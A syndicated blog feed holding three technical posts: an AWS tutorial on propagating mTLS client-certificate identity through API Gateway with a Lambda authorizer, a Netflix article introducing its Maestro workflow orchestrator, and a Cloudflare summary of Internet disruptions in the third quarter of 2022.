Propagating valid mTLS client certificate identity to downstream services using Amazon API Gateway

Post Syndicated from Eric Johnson original https://aws.amazon.com/blogs/compute/propagating-valid-mtls-client-certificate-identity-to-downstream-services-using-amazon-api-gateway/

This blog written by Omkar Deshmane, Senior SA and Anton Aleksandrov, Principal SA, Serverless.

This blog shows how to use Amazon API Gateway with a custom authorizer to process incoming requests, validate the mTLS client certificate, extract the client certificate subject, and propagate it to the downstream application in a base64 encoded HTTP header.

This pattern allows you to terminate mTLS at the edge so downstream applications do not need to perform client certificate validation. With this approach, developers can focus on application logic and offload mTLS certificate management and validation to a dedicated service, such as API Gateway.

Overview

Authentication is one of the core security aspects that you must address when building a cloud application. Successful authentication proves you are who you are claiming to be. There are various common authentication patterns, such as cookie-based authentication, token-based authentication, or the topic of this blog – a certificate-based authentication.

Transport Layer Security (TLS) certificates are at the core of a secure and safe internet. TLS certificates secure the connection between the client and server by encrypting data, ensuring private communication. When using the TLS protocol, the server must prove its identity to the client using a certificate signed by a certificate authority trusted by the client.

Mutual TLS (mTLS) introduces an additional layer of security, in which both the client and server must prove their identities to each other. Developers commonly use mTLS for application-to-application authentication — using digital certificates to represent both client and server apps is a common authentication pattern for building such workflows. We highly recommended decoupling the mTLS implementation from the application business logic so that you do not have to update the application when changing the mTLS configuration. It is a common pattern to implement the mTLS authentication and termination in a network appliance at the edge, such as Amazon API Gateway.

In this solution, we show a pattern of using API Gateway with an authorizer implemented with AWS Lambda to validate the mTLS client certificate, extract the client certificate subject, and propagate it to the downstream application in a base64 encoded HTTP header.

While this blog describes how to implement this pattern for identities extracted from the mTLS client certificates, you can generalize it and apply to propagating information obtained via any other means of authentication.

mTLS Sample Application

This blog includes a sample application implemented using the AWS Serverless Application Model (AWS SAM). It creates a demo environment containing resources like API Gateway, a Lambda authorizer, and an Amazon EC2 instance, which simulates the backend application.

The EC2 instance is used for the backend application to mimic common customer scenarios. You can use any other type of compute, such as Lambda functions or containerized applications with Amazon Elastic Container Service (Amazon ECS) or Amazon Elastic Kubernetes Service (Amazon EKS), as a backend application layer as well.

The following diagram shows the solution architecture:

Example architecture diagram

Example architecture diagram

  1. Store the client certificate in a trust store in an Amazon S3 bucket.
  2. The client makes a request to the API Gateway endpoint, supplying the client certificate to establish the mTLS session.
  3. API Gateway retrieves the trust store from the S3 bucket. It validates the client certificate, matches the trusted authorities, and terminates the mTLS connection.
  4. API Gateway invokes the Lambda authorizer, providing the request context and the client certificate information.
  5. The Lambda authorizer extracts the client certificate subject. It performs any necessary custom validation, and returns the extracted subject to API Gateway as a part of the authorization context.
  6. API Gateway injects the subject extracted in the previous step into the integration request HTTP header and sends the request to a downstream endpoint.
  7. The backend application receives the request, extracts the injected subject, and uses it with custom business logic.

Prerequisites and deployment

Some resources created as part of this sample architecture deployment have associated costs, both when running and idle. This includes resources like Amazon Virtual Private Cloud (Amazon VPC), VPC NAT Gateway, and EC2 instances. We recommend deleting the deployed stack after exploring the solution to avoid unexpected costs. See the Cleaning Up section for details.

Refer to the project code repository for instructions to deploy the solution using AWS SAM. The deployment provisions multiple resources, taking several minutes to complete.

Following the successful deployment, refer to the RestApiEndpoint variable in the Output section to locate the API Gateway endpoint. Note this value for testing later.

AWS CloudFormation output

AWS CloudFormation output

Key areas in the sample code

There are two key areas in the sample project code.

In src/authorizer/index.js, the Lambda authorizer code extracts the subject from the client certificate. It returns the value as part of the context object to API Gateway. This allows API Gateway to use this value in the subsequent integration request.

const crypto = require('crypto');

exports.handler = async (event) => {
    console.log ('> handler', JSON.stringify(event, null, 4));

    const clientCertPem = event.requestContext.identity.clientCert.clientCertPem;
    const clientCert = new crypto.X509Certificate(clientCertPem);
    const clientCertSub = clientCert.subject.replaceAll('\n', ',');

    const response = {
        principalId: clientCertSub,
        context: { clientCertSub },
        policyDocument: {
            Version: '2012-10-17',
            Statement: [{
                Action: 'execute-api:Invoke',
                Effect: 'allow',
                Resource: event.methodArn
            }]
        }
    };

    console.log('Authorizer Response', JSON.stringify(response, null, 4));
    return response;
};

In template.yaml, API Gateway injects the client certificate subject extracted by the Lambda authorizer previously into the integration request as X-Client-Cert-Sub HTTP header. X-Client-Cert-Sub is a custom header name and you can choose any other custom header name instead.

SayHelloGetMethod:
    Type: AWS::ApiGateway::Method
    Properties:
      AuthorizationType: CUSTOM
      AuthorizerId: !Ref CustomAuthorizer
      HttpMethod: GET
      ResourceId: !Ref SayHelloResource
      RestApiId: !Ref RestApi
      Integration:
        Type: HTTP_PROXY
        ConnectionType: VPC_LINK
        ConnectionId: !Ref VpcLink
        IntegrationHttpMethod: GET
        Uri: !Sub 'http://${NetworkLoadBalancer.DNSName}:3000/'
        RequestParameters:
          'integration.request.header.X-Client-Cert-Sub': 'context.authorizer.clientCertSub' 

Testing the example

You create a client key and certificate during the deployment, which are stored in the /certificates directory. Use the curl command to make a request to the REST API endpoint using these files.

curl --cert certificates/client.pem --key certificates/client.key \
<use the RestApiEndpoint found in CloudFormation output>
Example flow diagram

Example flow diagram

The client request to API Gateway uses mTLS with a client certificate supplied for mutual TLS authentication. API Gateway uses the Lambda authorizer to extract the certificate subject, and inject it into the Integration request.

The HTTP server runs on the EC2 instance, simulating the backend application. It accepts the incoming request and echoes it back, supplying request headers as part of the response body. The HTTP response received from the backend application contains a simple message and a copy of the request headers sent from API Gateway to the backend.

One header is x-client-cert-sub with the Common Name value you provided to the client certificate during creation. Verify that the value matches the Common Name that you provided when generating the client certificate.

Response example

Response example

API Gateway validated the mTLS client certificate, used the Lambda authorizer to extract the subject common name from the certificate, and forwarded it to the downstream application.

Cleaning up

Use the sam delete command in the api-gateway-certificate-propagation directory to delete the sample application infrastructure:

sam delete

You can also refer to the project code repository for the clean-up instructions.

Conclusion

This blog shows how to use the API Gateway with a Lambda authorizer for mTLS client certificate validation, custom field extraction, and downstream propagation to backend systems. This pattern allows you to terminate mTLS at the edge so that downstream applications are not responsible for client certificate validation.

For additional documentation, refer to Using API Gateway with Lambda Authorizer. Download the sample code from the project code repository. For more serverless learning resources, visit Serverless Land.

Orchestrating Data/ML Workflows at Scale With Netflix Maestro

Post Syndicated from Netflix Technology Blog original https://netflixtechblog.com/orchestrating-data-ml-workflows-at-scale-with-netflix-maestro-aaa2b41b800c

by Jun He, Akash Dwivedi, Natallia Dzenisenka, Snehal Chennuru, Praneeth Yenugutala, Pawan Dixit

At Netflix, Data and Machine Learning (ML) pipelines are widely used and have become central for the business, representing diverse use cases that go beyond recommendations, predictions and data transformations. A large number of batch workflows run daily to serve various business needs. These include ETL pipelines, ML model training workflows, batch jobs, etc. As Big data and ML became more prevalent and impactful, the scalability, reliability, and usability of the orchestrating ecosystem have increasingly become more important for our data scientists and the company.

In this blog post, we introduce and share learnings on Maestro, a workflow orchestrator that can schedule and manage workflows at a massive scale.

Motivation

Scalability and usability are essential to enable large-scale workflows and support a wide range of use cases. Our existing orchestrator (Meson) has worked well for several years. It schedules around 70 thousands of workflows and half a million jobs per day. Due to its popularity, the number of workflows managed by the system has grown exponentially. We started seeing signs of scale issues, like:

  • Slowness during peak traffic moments like 12 AM UTC, leading to increased operational burden. The scheduler on-call has to closely monitor the system during non-business hours.
  • Meson was based on a single leader architecture with high availability. As the usage increased, we had to vertically scale the system to keep up and were approaching AWS instance type limits.

With the high growth of workflows in the past few years — increasing at > 100% a year, the need for a scalable data workflow orchestrator has become paramount for Netflix’s business needs. After perusing the current landscape of workflow orchestrators, we decided to develop a next generation system that can scale horizontally to spread the jobs across the cluster consisting of 100’s of nodes. It addresses the key challenges we face with Meson and achieves operational excellence.

Challenges in Workflow Orchestration

Scalability

The orchestrator has to schedule hundreds of thousands of workflows, millions of jobs every day and operate with a strict SLO of less than 1 minute of scheduler introduced delay even when there are spikes in the traffic. At Netflix, the peak traffic load can be a few orders of magnitude higher than the average load. For example, a lot of our workflows are run around midnight UTC. Hence, the system has to withstand bursts in traffic while still maintaining the SLO requirements. Additionally, we would like to have a single scheduler cluster to manage most of user workflows for operational and usability reasons.

Another dimension of scalability to consider is the size of the workflow. In the data domain, it is common to have a super large number of jobs within a single workflow. For example, a workflow to backfill hourly data for the past five years can lead to 43800 jobs (24 * 365 * 5), each of which processes data for an hour. Similarly, ML model training workflows usually consist of tens of thousands of training jobs within a single workflow. Those large-scale workflows might create hotspots and overwhelm the orchestrator and downstream systems. Therefore, the orchestrator has to manage a workflow consisting of hundreds of thousands of jobs in a performant way, which is also quite challenging.

Usability

Netflix is a data-driven company, where key decisions are driven by data insights, from the pixel color used on the landing page to the renewal of a TV-series. Data scientists, engineers, non-engineers, and even content producers all run their data pipelines to get the necessary insights. Given the diverse backgrounds, usability is a cornerstone of a successful orchestrator at Netflix.

We would like our users to focus on their business logic and let the orchestrator solve cross-cutting concerns like scheduling, processing, error handling, security etc. It needs to provide different grains of abstractions for solving similar problems, high-level to cater to non-engineers and low-level for engineers to solve their specific problems. It should also provide all the knobs for configuring their workflows to suit their needs. In addition, it is critical for the system to be debuggable and surface all the errors for users to troubleshoot, as they improve the UX and reduce the operational burden.

Providing abstractions for the users is also needed to save valuable time on creating workflows and jobs. We want users to rely on shared templates and reuse their workflow definitions across their team, saving time and effort on creating the same functionality. Using job templates across the company also helps with upgrades and fixes: when the change is made in a template it’s automatically updated for all workflows that use it.

However, usability is challenging as it is often opinionated. Different users have different preferences and might ask for different features. Sometimes, the users might ask for the opposite features or ask for some niche cases, which might not necessarily be useful for a broader audience.

Introducing Maestro

Maestro is the next generation Data Workflow Orchestration platform to meet the current and future needs of Netflix. It is a general-purpose workflow orchestrator that provides a fully managed workflow-as-a-service (WAAS) to the data platform at Netflix. It serves thousands of users, including data scientists, data engineers, machine learning engineers, software engineers, content producers, and business analysts, for various use cases.

Maestro is highly scalable and extensible to support existing and new use cases and offers enhanced usability to end users. Figure 1 shows the high-level architecture.

Figure 1. Maestro high level architecture
Figure 1. Maestro high level architecture

In Maestro, a workflow is a DAG (Directed acyclic graph) of individual units of job definition called Steps. Steps can have dependencies, triggers, workflow parameters, metadata, step parameters, configurations, and branches (conditional or unconditional). In this blog, we use step and job interchangeably. A workflow instance is an execution of a workflow, similarly, an execution of a step is called a step instance. Instance data include the evaluated parameters and other information collected at runtime to provide different kinds of execution insights. The system consists of 3 main micro services which we will expand upon in the following sections.

Maestro ensures the business logic is run in isolation. Maestro launches a unit of work (a.k.a. Steps) in a container and ensures the container is launched with the users/applications identity. Launching with identity ensures the work is launched on-behalf-of the user/application, the identity is later used by the downstream systems to validate if an operation is allowed or not, for an example user/application identity is checked by the data warehouse to validate if a table read/write is allowed or not.

Workflow Engine

Workflow engine is the core component, which manages workflow definitions, the lifecycle of workflow instances, and step instances. It provides rich features to support:

  • Any valid DAG patterns
  • Popular data flow constructs like sub workflow, foreach, conditional branching etc.
  • Multiple failure modes to handle step failures with different error retry policies
  • Flexible concurrency control to throttle the number of executions at workflow/step level
  • Step templates for common job patterns like running a Spark query or moving data to Google sheets
  • Support parameter code injection using customized expression language
  • Workflow definition and ownership management.
    Timeline including all state changes and related debug info.

We use Netflix open source project Conductor as a library to manage the workflow state machine in Maestro. It ensures to enqueue and dequeue each step defined in a workflow with at least once guarantee.

Time-Based Scheduling Service

Time-based scheduling service starts new workflow instances at the scheduled time specified in workflow definitions. Users can define the schedule using cron expression or using periodic schedule templates like hourly, weekly etc;. This service is lightweight and provides an at-least-once scheduling guarantee. Maestro engine service will deduplicate the triggering requests to achieve an exact-once guarantee when scheduling workflows.

Time-based triggering is popular due to its simplicity and ease of management. But sometimes, it is not efficient. For example, the daily workflow should process the data when the data partition is ready, not always at midnight. Therefore, on top of manual and time-based triggering, we also provide event-driven triggering.

Signal Service

Maestro supports event-driven triggering over signals, which are pieces of messages carrying information such as parameter values. Signal triggering is efficient and accurate because we don’t waste resources checking if the workflow is ready to run, instead we only execute the workflow when a condition is met.

Signals are used in two ways:

  • A trigger to start new workflow instances
  • A gating function to conditionally start a step (e.g., data partition readiness)

Signal service goals are to

  • Collect and index signals
  • Register and handle workflow trigger subscriptions
  • Register and handle the step gating functions
  • Captures the lineage of workflows triggers and steps unblocked by a signal
Figure 2. Signal service high level architecture
Figure 2. Signal service high level architecture

The maestro signal service consumes all the signals from different sources, e.g. all the warehouse table updates, S3 events, a workflow releasing a signal, and then generates the corresponding triggers by correlating a signal with its subscribed workflows. In addition to the transformation between external signals and workflow triggers, this service is also responsible for step dependencies by looking up the received signals in the history. Like the scheduling service, the signal service together with Maestro engine achieves exactly-once triggering guarantees.

Signal service also provides the signal lineage, which is useful in many cases. For example, a table updated by a workflow could lead to a chain of downstream workflow executions. Most of the time the workflows are owned by different teams, the signal lineage helps the upstream and downstream workflow owners to see who depends on whom.

Orchestration at Scale

All services in the Maestro system are stateless and can be horizontally scaled out. All the requests are processed via distributed queues for message passing. By having a shared nothing architecture, Maestro can horizontally scale to manage the states of millions of workflow and step instances at the same time.

CockroachDB is used for persisting workflow definitions and instance state. We chose CockroachDB as it is an open-source distributed SQL database that provides strong consistency guarantees that can be scaled horizontally without much operational overhead.

It is hard to support super large workflows in general. For example, a workflow definition can explicitly define a DAG consisting of millions of nodes. With that number of nodes in a DAG, UI cannot render it well. We have to enforce some constraints and support valid use cases consisting of hundreds of thousands (or even millions) of step instances in a workflow instance.

Based on our findings and user feedback, we found that in practice

  • Users don’t want to manually write the definitions for thousands of steps in a single workflow definition, which is hard to manage and navigate over UI. When such a use case exists, it is always feasible to decompose the workflow into smaller sub workflows.
  • Users expect to repeatedly run a certain part of DAG hundreds of thousands (or even millions) times with different parameter settings in a given workflow instance. So at runtime, a workflow instance might include millions of step instances.

Therefore, we enforce a workflow DAG size limit (e.g. 1K) and we provide a foreach pattern that allows users to define a sub DAG within a foreach block and iterate the sub DAG with a larger limit (e.g. 100K). Note that foreach can be nested by another foreach. So users can run millions or billions of steps in a single workflow instance.

In Maestro, foreach itself is a step in the original workflow definition. Foreach is internally treated as another workflow which scales similarly as any other Maestro workflow based on the number of step executions in the foreach loop. The execution of sub DAG within foreach will be delegated to a separate workflow instance. Foreach step will then monitor and collect status of those foreach workflow instances, each of which manages the execution of one iteration.

Figure 3. Maestro’s scalable foreach design to support super large iterations
Figure 3. Maestro’s scalable foreach design to support super large iterations

With this design, foreach pattern supports sequential loop and nested loop with high scalability. It is easy to manage and troubleshoot as users can see the overall loop status at the foreach step or view each iteration separately.

Workflow Platform for Everyone

We aim to make Maestro user friendly and easy to learn for users with different backgrounds. We made some assumptions about user proficiency in programming languages and they can bring their business logic in multiple ways, including but not limited to, a bash script, a Jupyter notebook, a Java jar, a docker image, a SQL statement, or a few clicks in the UI using parameterized workflow templates.

User Interfaces

Maestro provides multiple domain specific languages (DSLs) including YAML, Python, and Java, for end users to define their workflows, which are decoupled from their business logic. Users can also directly talk to Maestro API to create workflows using the JSON data model. We found that human readable DSL is popular and plays an important role to support different use cases. YAML DSL is the most popular one due to its simplicity and readability.

Here is an example workflow defined by different DSLs.

Figure 4. An example workflow defined by YAML, Python, and Java DSLs
Figure 4. An example workflow defined by YAML, Python, and Java DSLs

Additionally, users can also generate certain types of workflows on UI or use other libraries, e.g.

  • In Notebook UI, users can directly schedule to run the chosen notebook periodically.
  • In Maestro UI, users can directly schedule to move data from one source (e.g. a data table or a spreadsheet) to another periodically.
  • Users can use Metaflow library to create workflows in Maestro to execute DAGs consisting of arbitrary Python code.

Parameterized Workflows

Lots of times, users want to define a dynamic workflow to adapt to different scenarios. Based on our experiences, a completely dynamic workflow is less favorable and hard to maintain and troubleshooting. Instead, Maestro provides three features to assist users to define a parameterized workflow

  • Conditional branching
  • Sub-workflow
  • Output parameters

Instead of dynamically changing the workflow DAG at runtime, users can define those changes as sub workflows and then invoke the appropriate sub workflow at runtime because the sub workflow id is a parameter, which is evaluated at runtime. Additionally, using the output parameter, users can produce different results from the upstream job step and then iterate through those within the foreach, pass it to the sub workflow, or use it in the downstream steps.

Here is an example (using YAML DSL) of backfill workflow with 2 steps. In step1, the step computes the backfill ranges and returns the dates back. Next, foreach step uses the dates from step1 to create foreach iterations. Finally, each of the backfill jobs gets the date from the foreach and backfills the data based on the date.

Workflow:
id: demo.pipeline
jobs:
- job:
id: step1
type: NoOp
'!dates': return new int[]{20220101,20220102,20220103}; #SEL
- foreach:
id: step2
params:
date: ${dates@step1} #reference a upstream step parameter
jobs:
- job:
id: backfill
type: Notebook
notebook:
input_path: s3://path/to/notebook.ipynb
arg1: $date #pass the foreach parameter into notebook
Figure 4. An example of using parameterized workflow for backfill data
Figure 5. An example of using parameterized workflow for backfill data

The parameter system in Maestro is completely dynamic with code injection support. Users can write the code in Java syntax as the parameter definition. We developed our own secured expression language (SEL) to ensure security. It only exposes limited functionality and includes additional checks (e.g. the number of iteration in the loop statement, etc.) in the language parser.

Execution Abstractions

Maestro provides multiple levels of execution abstractions. Users can choose to use the provided step type and set its parameters. This helps to encapsulate the business logic of commonly used operations, making it very easy for users to create jobs. For example, for spark step type, all users have to do is just specify needed parameters like spark sql query, memory requirements, etc, and Maestro will do all behind-the-scenes to create the step. If we have to make a change in the business logic of a certain step, we can do so seamlessly for users of that step type.

If provided step types are not enough, users can also develop their own business logic in a Jupyter notebook and then pass it to Maestro. Advanced users can develop their own well-tuned docker image and let Maestro handle the scheduling and execution.

Additionally, we abstract the common functions or reusable patterns from various use cases and add them to the Maestro in a loosely coupled way by introducing job templates, which are parameterized notebooks. This is different from step types, as templates provide a combination of various steps. Advanced users also leverage this feature to ship common patterns for their own teams. While creating a new template, users can define the list of required/optional parameters with the types and register the template with Maestro. Maestro validates the parameters and types at the push and run time. In the future, we plan to extend this functionality to make it very easy for users to define templates for their teams and for all employees. In some cases, sub-workflows are also used to define common sub DAGs to achieve multi-step functions.

Moving Forward

We are taking Big Data Orchestration to the next level and constantly solving new problems and challenges, please stay tuned. If you are motivated to solve large scale orchestration problems, please join us as we are hiring.


Orchestrating Data/ML Workflows at Scale With Netflix Maestro was originally published in Netflix TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Internet disruptions overview for Q3 2022

Post Syndicated from David Belson original https://blog.cloudflare.com/q3-2022-internet-disruption-summary/

Internet disruptions overview for Q3 2022

Internet disruptions overview for Q3 2022

Cloudflare operates in more than 275 cities in over 100 countries, where we interconnect with over 10,000 network providers in order to provide a broad range of services to millions of customers. The breadth of both our network and our customer base provides us with a unique perspective on Internet resilience, enabling us to observe the impact of Internet disruptions. In many cases, these disruptions can be attributed to a physical event, while in other cases, they are due to an intentional government-directed shutdown. In this post, we review selected Internet disruptions observed by Cloudflare during the third quarter of 2022, supported by traffic graphs from Cloudflare Radar and other internal Cloudflare tools, and grouped by associated cause or common geography. The new Cloudflare Radar Outage Center provides additional information on these, and other historical, disruptions.

Government directed shutdowns

Unfortunately, for the last decade, governments around the world have turned to shutting down the Internet as a means of controlling or limiting communication among citizens and with the outside world. In the third quarter, this was an all too popular cause of observed disruptions, impacting countries and regions in Africa, the Middle East, Asia, and the Caribbean.

Iraq

As mentioned in our Q2 summary blog post, on June 27, the Kurdistan Regional Government in Iraq began to implement twice-weekly (Mondays and Thursday) multi-hour regional Internet shutdowns over the following four weeks, intended to prevent cheating on high school final exams. As seen in the figure below, these shutdowns occurred as expected each Monday and Thursday through July 21, with the exception of July 21. They impacted three governorates in Iraq, and lasted from 0630–1030 local time (0330–0730 UTC) each day.

Internet disruptions overview for Q3 2022
Erbil, Sulaymaniyah, and Duhok Governorates, Iraq. (Source: Map data ©2022 Google, Mapa GISrael)
Internet disruptions overview for Q3 2022

Cuba

In Cuba, an Internet disruption was observed between 0055-0150 local time (0455-0550 UTC) on July 15 amid reported anti-government protests in Los Palacios and Pinar del Rio.

Internet disruptions overview for Q3 2022
Los Palacios and Pinar del Rio, Cuba. (Source: Map data ©2022 INEGI)
Internet disruptions overview for Q3 2022

Closing out the quarter, another significant disruption was observed in Cuba, reportedly in response to protests over the lack of electricity in the wake of Hurricane Ian. A complete outage is visible in the figure below between 2030 on September 29 and 0315 on September 30 local time (0030-0715 UTC on September 30).

Internet disruptions overview for Q3 2022

Afghanistan

Telecommunications services were reportedly shut down in part of Kabul, Afghanistan on the morning of August 8. The figure below shows traffic dropping starting around 0930 local time (0500 UTC), recovering 11 hours later, around 2030 local time (1600 UTC).

Internet disruptions overview for Q3 2022
Kabul, Afghanistan. (Source: Map data ©2022 Google)
Internet disruptions overview for Q3 2022

Sierra Leone

Protests in Freetown, Sierra Leone over the rising cost of living likely drove the Internet disruptions observed within the country on August 10 & 11. The first one occurred between 1200-1400 local time (1200-1400 UTC) on August 10. While this outage is believed to have been government directed as a means of quelling the protests, Zoodlabs, which manages Sierra Leone Cable Limited, claimed that the outage was the result of “emergency technical maintenance on some of our international routes”.

A second longer outage was observed between 0100-0730 local time (0100-0730 UTC) on August 11, as seen in the figure below. These shutdowns follow similar behavior in years past, where Internet connectivity was shut off following elections within the country.

Internet disruptions overview for Q3 2022
Freetown, Sierra Leone (Source: Map data ©2022 Google, Inst. Geogr. Nacional)
Internet disruptions overview for Q3 2022

Region of Somaliland

In Somaliland, local authorities reportedly cut off Internet service on August 11 ahead of scheduled opposition demonstrations. The figure below shows a complete Internet outage in Woqooyi Galbeed between 0645-1355 local time (0345-1055 UTC.)

Internet disruptions overview for Q3 2022
Woqooyi Galbeed, Region of Somaliland. (Source: Map data ©2022 Google, Mapa GISrael)
Internet disruptions overview for Q3 2022

At a network level, the observed outage was due to a loss of traffic from AS37425 (SomCable) and AS37563 (Somtel), as shown in the figures below. Somtel is a mobile services provider, while SomCable is focused on providing wireline Internet access.

Internet disruptions overview for Q3 2022
Internet disruptions overview for Q3 2022

India

India is no stranger to government-directed Internet shutdowns, taking such action hundreds of times over the last decade. This may be changing in the future, however, as the country’s Supreme Court ordered the Ministry of Electronics and Information Technology (MEITY) to reveal the grounds upon which it imposes or approves Internet shutdowns. Until this issue is resolved, we will continue to see regional shutdowns across the country.

One such example occurred in Assam, where mobile Internet connectivity was shut down to prevent cheating on exams. The figure below shows that these shutdowns were implemented twice daily on August 21 and August 28. While the shutdowns were officially scheduled to take place between 1000-1200 and 1400-1600 local time (0430-0630 and 0830-1030 UTC), some providers reportedly suspended connectivity starting in the early morning.

Internet disruptions overview for Q3 2022
Assam, India. (Source: Map data ©2022 Google, TMap Mobility)
Internet disruptions overview for Q3 2022

Iran

In late September, protests and demonstrations have erupted across Iran in response to the death of Mahsa Amini. Amini was a 22-year-old woman from the Kurdistan Province of Iran, and was arrested on September 13, 2022, in Tehran by Iran’s “morality police”, a unit that enforces strict dress codes for women. She died on September 16 while in police custody. In response to these protests and demonstrations, Internet connectivity across the country experienced multiple waves of disruptions.

In addition to multi-hour outages in Sanadij and Tehran province on September 19 and 21 that were covered in a blog post, three mobile network providers — AS44244 (Irancell), AS57218 (RighTel), and AS197207 (MCCI) — implemented daily Internet “curfews”, generally taking place between 1600 and midnight local time (1230-2030 UTC), although the start times varied on several days. These regular shutdowns are clearly visible in the figure below, and continued into early October.

Internet disruptions overview for Q3 2022
Sanandij and Tehran, Iran. (Source: Map data ©2022 Google)
Internet disruptions overview for Q3 2022

As noted in the blog post, access to DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT) services was also blocked in Iran starting on September 20, and in a move that is likely related, connections over HTTP/3 and QUIC were blocked starting on September 22, as shown in the figure below from Cloudflare Radar.

Internet disruptions overview for Q3 2022

Natural disasters

Natural disasters such as earthquakes and hurricanes wreak havoc on impacted geographies, often causing loss of life, as well as significant structural damage to buildings of all types. Infrastructure damage is also extremely common, with widespread loss of both electrical power and telecommunications infrastructure.

Papua New Guinea

On September 11, a 7.6 magnitude earthquake struck Papua New Guinea, resulting in landslides, cracked roads, and Internet connectivity disruptions. Traffic to the country dropped by 26% just after 1100 local time (0100 UTC) . The figure below shows that traffic volumes remained lower into the following day as well. An announcement from PNG DataCo, a local provider, noted that the earthquake “has affected the operations of the Kumul Submarine Cable Network (KSCN) Express Link between Port Moresby and Madang and the PPC-1 Cable between Madang and Sydney.” This damage, they stated, resulted in the observed outage and degraded service.

Internet disruptions overview for Q3 2022

Mexico

Just over a week later, a 7.6 magnitude earthquake struck the Colima-Michoacan border region in Mexico at 1305 local time (1805 UTC). As shown in the figure below, traffic dropped over 50% in the impacted states immediately after the quake occurred, but recovered fairly quickly, returning to normal levels by around 1600 local time (2100 UTC).

Internet disruptions overview for Q3 2022
Earthquake epicenter, 35 km SW of Aguililla, Mexico. (Source: Map data ©2022 INEGI)
Internet disruptions overview for Q3 2022

Hurricane Fiona

Several major hurricanes plowed their way up the east coast of North America in late September, causing significant damage, resulting in Internet disruptions. On September 18, island-wide power outages caused by Hurricane Fiona disrupted Internet connectivity on Puerto Rico. As the figure below illustrates, it took over 10 days for traffic volumes to return to expected levels. Luma Energy, the local power company, kept customers apprised of repair progress through regular updates to its Twitter feed.

Internet disruptions overview for Q3 2022

Two days later, Hurricane Fiona slammed the Turks and Caicos islands, causing flooding and significant damage, as well as disrupting Internet connectivity. The figure below shows traffic starting to drop below expected levels around 1245 local time (1645 UTC) on September 20. Recovery took approximately a day, with traffic returning to expected levels around 1100 local time (1500 UTC) on September 21.

Internet disruptions overview for Q3 2022

Continuing to head north, Hurricane Fiona ultimately made landfall in the Canadian province of Nova Scotia on September 24, causing power outages and disrupting Internet connectivity. The figure below shows that the most significant impact was seen in Nova Scotia. As Nova Scotia Power worked to restore service to customers, traffic volumes gradually increased, as seen in the figure below. By September 29, traffic volumes on the island had returned to normal levels.

Internet disruptions overview for Q3 2022

Hurricane Ian

On September 28, Hurricane Ian made landfall in Florida, and was the strongest hurricane to hit Florida since Hurricane Michael in 2018. With over four million customers losing power due to damage from the storm, a number of cities experienced associated Internet disruptions. Traffic from impacted cities dropped significantly starting around 1500 local time (1900 UTC), and as the figure below shows, recovery has been slow, with traffic levels still not back to pre-storm volumes more than two weeks later.

Internet disruptions overview for Q3 2022
Sarasota, Naples, Fort Myers, Cape Coral, North Port, Port Charlotte, Punta Gorda, and Marco Island, Florida. (Source: Map data ©2022 Google, INEGI)
Internet disruptions overview for Q3 2022

Power outages

In addition to power outages caused by earthquakes and hurricanes, a number of other power outages caused multi-hour Internet disruptions during the third quarter.

Iran

A reported power outage in a key data center building disrupted Internet connectivity for customers of local ISP Shatel in Iran on July 25. As seen in the figure below, traffic dropped significantly at approximately 0715 local time (0345 UTC). Recovery began almost immediately, with traffic nearing expected levels by 0830 local time (0500 UTC).

Internet disruptions overview for Q3 2022

Venezuela

Electrical issues frequently disrupt Internet connectivity in Venezuela, and the independent @vesinfiltro Twitter account tracks these events closely. One such example occurred on August 9, when electrical issues disrupted connectivity across multiple states, including Mérida, Táchira, Barinas, Portuguesa, and Estado Trujillo. The figure below shows evidence of two disruptions, the first around 1340 local time (1740 UTC) and the second a few hours later, starting at around 1615 local time (2015 UTC). In both cases, traffic volumes appeared to recover fairly quickly.

Internet disruptions overview for Q3 2022
Mérida, Táchira, Barinas, Portuguesa, and Estado Trujillo, Venezuela. (Source: Map data ©2022 Google. INEGI)
Internet disruptions overview for Q3 2022

Oman

On September 5, a power outage in Oman impacted energy, aviation, and telecommunications services. The latter is evident in the figure below, which shows the country’s traffic volume dropping nearly 60% when the outage began just before 1515 local time (0915 UTC). Although authorities claimed that “the electricity network would be restored within four hours,” traffic did not fully return to normal levels until 0400 local time on September 6 (2200 UTC on September 5) the following day, approximately 11 hours later.

Internet disruptions overview for Q3 2022

Ukraine

Over the last seven-plus months of war in Ukraine, we have observed multiple Internet disruptions due to infrastructure damage and power outages related to the fighting. We have covered these disruptions in our first and second quarter summary blog posts, and continue to do so on our @CloudflareRadar Twitter account as they occur. Power outages were behind Internet disruptions observed in Kharkiv on September 11, 12, and 13.

The figure below shows that the first disruption started around 2000 local time (1700 UTC) on September 11. This near-complete outage lasted just over 12 hours, with traffic returning to normal levels around 0830 local time (0530 UTC) on the 12th. However, later that day, another partial outage occurred, with a 50% traffic drop seen at 1330 local time (1030 UTC). This one was much shorter, with recovery starting approximately an hour later. Finally, a nominal disruption is visible at 0800 local time (0500 UTC) on September 13, with lower than expected traffic volumes lasting for around five hours.

Internet disruptions overview for Q3 2022

Cable damage

Damage to both terrestrial and submarine cables have caused many Internet disruptions over the years. The recent alleged sabotage of the sub-sea Nord Stream natural gas pipelines has brought an increasing level of interest from European media (including Swiss and French publications) around just how important submarine cables are to the Internet, and an increasing level of concern among policymakers about the safety of these cable systems and the potential impact of damage to them. However, the three instances of cable damage reviewed below are all related to terrestrial cable.

Iran

On August 1, a reported “fiber optic cable” problem caused by a fire in a telecommunications manhole disrupted connectivity across multiple network providers, including AS31549 (Aria Shatel), AS58224 (TIC), AS43754 (Asiatech), AS44244 (Irancell), and AS197207 (MCCI). The disruption started around 1215 local time (0845 UTC) and lasted for approximately four hours. Because it impacted a number of major wireless and wireline networks, the impact was visible at a country level as well, as seen in the figure below.

Internet disruptions overview for Q3 2022

Pakistan

Cable damage due to heavy rains and flooding caused several Internet disruptions in Pakistan in August. The first notable disruption occurred on August 19, starting around 0700 local time (0200 UTC) and lasted just over six and a half hours. On August 22, another significant disruption is also visible, starting at 2250 local time (1750 UTC), with a further drop at 0530 local time (0030 UTC) on the 23rd. The second more significant drop was brief, lasting only 45 minutes, after which traffic began to recover.

Internet disruptions overview for Q3 2022

Haiti

Amidst protests over fuel price hikes, fiber cuts in Haiti caused Internet outages on multiple network providers. Starting at 1500 local time (1900 UTC) on September 14, traffic on AS27759 (Access Haiti) fell to zero. According to a (translated) Twitter post from the provider, they had several fiber optic cables that were cut in various areas of the country, and blocked roads made it “really difficult” for their technicians to reach the problem areas. Repairs were eventually made, with traffic starting to increase again around 0830 local time (1230 UTC) on September 15, as shown in the figure below.

Internet disruptions overview for Q3 2022

